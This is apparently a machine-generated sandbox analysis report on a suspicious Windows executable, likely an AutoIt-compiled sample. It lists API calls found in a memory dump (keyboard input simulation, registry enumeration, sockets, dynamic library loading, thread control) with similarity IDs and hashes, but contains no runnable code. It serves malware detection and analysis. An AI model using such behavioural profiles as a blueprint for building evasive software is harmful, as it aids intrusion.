                                                                            • API ID:
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 0-1603158881
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateMenu.USER32 ref: 0087855C
                                                                            • SetMenu.USER32(?,00000000), ref: 0087856C
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008785F0
                                                                            • IsMenu.USER32(?), ref: 00878604
                                                                            • CreatePopupMenu.USER32 ref: 0087860E
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00878645
                                                                            • DrawMenuBar.USER32 ref: 0087864E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                            • String ID: 0
                                                                            • API String ID: 161812096-4108050209
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,008D90E8,?,00000100,?,C:\Users\user\33920049\fmkkelc.omp), ref: 0086403E
                                                                            • LoadStringW.USER32(00000000), ref: 00864047
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0086405C
                                                                            • LoadStringW.USER32(00000000), ref: 0086405F
                                                                            • _wprintf.LIBCMT ref: 00864088
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008640A0
                                                                            Strings
                                                                            • C:\Users\user\33920049\fmkkelc.omp, xrefs: 00864027
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00864083
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\33920049\fmkkelc.omp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memmove$_memcmp
                                                                            • String ID: '$\$h
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(008D7F04), ref: 0085C5DF
                                                                            • InterlockedDecrement.KERNEL32(008D7F04), ref: 0085C5FD
                                                                            • Sleep.KERNEL32(0000000A), ref: 0085C605
                                                                            • InterlockedIncrement.KERNEL32(008D7F04), ref: 0085C610
                                                                            • InterlockedDecrement.KERNEL32(008D7F04), ref: 0085C6C2
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                            • String ID: @COM_EVENTOBJ
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VariantClear.OLEAUT32(?), ref: 008A02D5
                                                                            • VariantClear.OLEAUT32(?), ref: 008A0409
                                                                            • VariantInit.OLEAUT32(?), ref: 008A045D
                                                                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 008A04BE
                                                                            • VariantClear.OLEAUT32(?), ref: 008A04D0
                                                                              • Part of subcall function 0086548F: VariantCopy.OLEAUT32(?,?), ref: 008654A0
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 008A0534
                                                                              • Part of subcall function 00865411: VariantClear.OLEAUT32(?), ref: 00865422
                                                                            • VariantClear.OLEAUT32(00000000), ref: 008A05C7
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                            • String ID: H
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 008652F4
                                                                            • VariantClear.OLEAUT32(?), ref: 0086532E
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 0086534E
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00865381
                                                                            • VariantClear.OLEAUT32(?), ref: 008653C1
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00865404
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                            • String ID: crts
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0087B433
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0087B466
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0087B483
                                                                            • _memmove.LIBCMT ref: 0087B4E1
                                                                            • _memmove.LIBCMT ref: 0087B504
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0087B513
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0087B52F
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0087B544
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0084515A
                                                                            • __calloc_crt.LIBCMT ref: 00845166
                                                                            • __getptd.LIBCMT ref: 00845173
                                                                            • CreateThread.KERNEL32 ref: 0084519A
                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008451AA
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 008451B5
                                                                            • _free.LIBCMT ref: 008451BE
                                                                            • __dosmaperr.LIBCMT ref: 008451C9
                                                                              • Part of subcall function 00847E9A: __getptd_noexit.LIBCMT ref: 00847E9A
                                                                            Similarity
                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00895196
                                                                              • Part of subcall function 0088875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,00896CC2,?,008A3B72,008A3B72,?), ref: 0088877B
                                                                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 008951D8
                                                                            • gethostbyname.WSOCK32(?), ref: 008951E3
                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00895259
                                                                            • _memmove.LIBCMT ref: 00895307
                                                                            • GlobalFree.KERNEL32 ref: 00895399
                                                                            • WSACleanup.WSOCK32 ref: 0089539F
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemMetrics.USER32 ref: 0087049C
                                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008706D8
                                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 008706F7
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0087071A
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 0087074F
                                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 00870772
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0087078C
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                            • String ID:
                                                                            • API String ID: 1457242333-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008770BF: DeleteObject.GDI32(00000000), ref: 008770FC
                                                                              • Part of subcall function 008770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
                                                                              • Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087714C
                                                                              • Part of subcall function 008770BF: BeginPath.GDI32(?), ref: 00877161
                                                                              • Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087718A
                                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 008773E8
                                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 008773F8
                                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 00877433
                                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 0087743C
                                                                            • CloseFigure.GDI32(?), ref: 00877443
                                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 00877452
                                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0087746E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                            • String ID:
                                                                            • API String ID: 4082120231-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089A51C
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0089A548
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0089A573
                                                                            • RegEnumValueW.ADVAPI32 ref: 0089A5A6
                                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0089A5CF
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0089A608
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0089A613
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                            • String ID:
                                                                            • API String ID: 2027346449-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0089C54C
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0089C55D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ErrorLastselect
                                                                            • String ID:
                                                                            • API String ID: 215497628-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00885314
                                                                            • ImageList_Remove.COMCTL32(?,?), ref: 00885348
                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 00885430
                                                                            • DeleteObject.GDI32(?), ref: 008856AB
                                                                            • DeleteObject.GDI32(?), ref: 008856B9
                                                                            • DestroyIcon.USER32(?), ref: 008856C7
                                                                            • DestroyWindow.USER32(?), ref: 008856D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                            • String ID:
                                                                            • API String ID: 2354583917-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                            • String ID:
                                                                            • API String ID: 3985565216-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                            • String ID:
                                                                            • API String ID: 3220332590-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove_strncmp
                                                                            • String ID: >$U$\
                                                                            • API String ID: 2666721431-237099441
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 0087C4E6
                                                                            • SetKeyboardState.USER32(00000080), ref: 0087C50A
                                                                            • PostMessageW.USER32 ref: 0087C54B
                                                                            • PostMessageW.USER32 ref: 0087C583
                                                                            • PostMessageW.USER32 ref: 0087C5A5
                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0087C638
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 2221674350-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                            • String ID:
                                                                            • API String ID: 1640429340-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 752480666-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                            • String ID:
                                                                            • API String ID: 3275902921-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,008D8178), ref: 0086319E
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631B9
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631C3
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631CB
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 0088553C
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 00885557
                                                                            • DeleteObject.GDI32(?), ref: 008856AB
                                                                            • DeleteObject.GDI32(?), ref: 008856B9
                                                                            • DestroyIcon.USER32(?), ref: 008856C7
                                                                            • DestroyWindow.USER32(?), ref: 008856D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 3691411573-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008770BF: DeleteObject.GDI32(00000000), ref: 008770FC
                                                                              • Part of subcall function 008770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
                                                                              • Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087714C
                                                                              • Part of subcall function 008770BF: BeginPath.GDI32(?), ref: 00877161
                                                                              • Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087718A
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 008771C4
                                                                            • LineTo.GDI32(?,?,?), ref: 008771D0
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 008771DE
                                                                            • LineTo.GDI32(?,?,?), ref: 008771EA
                                                                            • EndPath.GDI32(?), ref: 008771FA
                                                                            • StrokePath.GDI32(?), ref: 00877208
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                            • String ID:
                                                                            • API String ID: 372113273-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0083F048
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 0083F050
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 0083F05B
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0083F066
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 0083F06E
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083F076
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0087B5E1
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0087B5F2
                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0087B600
                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0087B60E
                                                                              • Part of subcall function 008625E5: CloseHandle.KERNEL32(00000000,00000000,?,0087B61A,00000000,?,000003E8,?,000001F6), ref: 008625F3
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0087B623
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0087B62A
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 008450E0
                                                                              • Part of subcall function 008477D1: TlsGetValue.KERNEL32(?,0084792A,?,008412DC,?,00000001), ref: 008477DA
                                                                              • Part of subcall function 008477D1: TlsSetValue.KERNEL32(00000000,?,008412DC,?,00000001), ref: 008477FB
                                                                            • ___fls_getvalue@4.LIBCMT ref: 008450EB
                                                                              • Part of subcall function 008477B1: TlsGetValue.KERNEL32(?,?,00843C50,00000000), ref: 008477BF
                                                                            • ___fls_setvalue@8.LIBCMT ref: 008450FD
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00845106
                                                                            • ExitThread.KERNEL32 ref: 0084510D
                                                                            • __freefls@4.LIBCMT ref: 00845129
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 442100245-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00878492
                                                                            • IsMenu.USER32(?), ref: 008784A6
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008784F4
                                                                            • DrawMenuBar.USER32 ref: 00878508
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                            • String ID: 0
                                                                            • API String ID: 3076010158-4108050209
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Handle
                                                                            • String ID: nul
                                                                            • API String ID: 2519475695-2873401336
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00873281
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Handle
                                                                            • String ID: nul
                                                                            • API String ID: 2519475695-2873401336
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0088D446
                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0088D4BC
                                                                            • __swprintf.LIBCMT ref: 0088D4D6
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0088D51A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
                                                                              • Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3
                                                                              • Part of subcall function 00866406: SendMessageTimeoutW.USER32 ref: 00866425
                                                                              • Part of subcall function 00866406: GetWindowThreadProcessId.USER32(?,00000000), ref: 00866438
                                                                              • Part of subcall function 00866406: GetCurrentThreadId.KERNEL32 ref: 0086643F
                                                                              • Part of subcall function 00866406: AttachThreadInput.USER32(00000000), ref: 00866446
                                                                            • GetFocus.USER32 ref: 008912C7
                                                                              • Part of subcall function 00866451: GetParent.USER32(?), ref: 0086645F
                                                                              • Part of subcall function 00866451: GetParent.USER32(?), ref: 0086646B
                                                                            • GetClassNameW.USER32 ref: 00891310
                                                                            • EnumChildWindows.USER32 ref: 0089133B
                                                                            • __swprintf.LIBCMT ref: 00891354
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                            • String ID: %s%d
                                                                            • API String ID: 2645982514-1110647743
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 0087C348
                                                                            • SetKeyboardState.USER32(00000080), ref: 0087C36C
                                                                            • PostMessageW.USER32 ref: 0087C3B0
                                                                            • PostMessageW.USER32 ref: 0087C3E8
                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0087C475
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 3031425849-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0089449A
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00894534
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00894553
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00894597
                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 008945B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 2449869053-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 3539004672-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(008D7F04), ref: 008AD3F2
                                                                            • InterlockedDecrement.KERNEL32(008D7F04), ref: 008AD407
                                                                            • Sleep.KERNEL32(0000000A), ref: 008AD40F
                                                                            • InterlockedIncrement.KERNEL32(008D7F04), ref: 008AD41A
                                                                            • InterlockedDecrement.KERNEL32(008D7F04), ref: 008AD524
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                            • String ID:
                                                                            • API String ID: 327565842-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32 ref: 0088C43C
                                                                            • GetPrivateProfileSectionW.KERNEL32 ref: 0088C464
                                                                            • WritePrivateProfileSectionW.KERNEL32 ref: 0088C4B0
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0088C4D4
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0088C4E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: 22edeb2ba0f86468a4546bfcf1c41d1ebd06ca9349491a0041654dad51273e87
                                                                            • Instruction ID: d1eb952d155ecf38ee3cc831418df12127da0950963ed9c289899c7d73e9d5a2
                                                                            • Opcode Fuzzy Hash: 22edeb2ba0f86468a4546bfcf1c41d1ebd06ca9349491a0041654dad51273e87
                                                                            • Instruction Fuzzy Hash: FA4142B5A00209BBDB10EBA4DC89F6EB3A8FF44704F148558F504DB251DB75EE44CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 008794F1
                                                                              • Part of subcall function 00860593: _wcspbrk.LIBCMT ref: 008605A3
                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 00879551
                                                                            • _wcslen.LIBCMT ref: 00879566
                                                                            • _wcslen.LIBCMT ref: 00879573
                                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 008795A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen$_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 1856069659-0
                                                                            • Opcode ID: 6d7be263176cf817af3e4401dba2673fc79a46e8372efdd9af5d1d58e4d3bc93
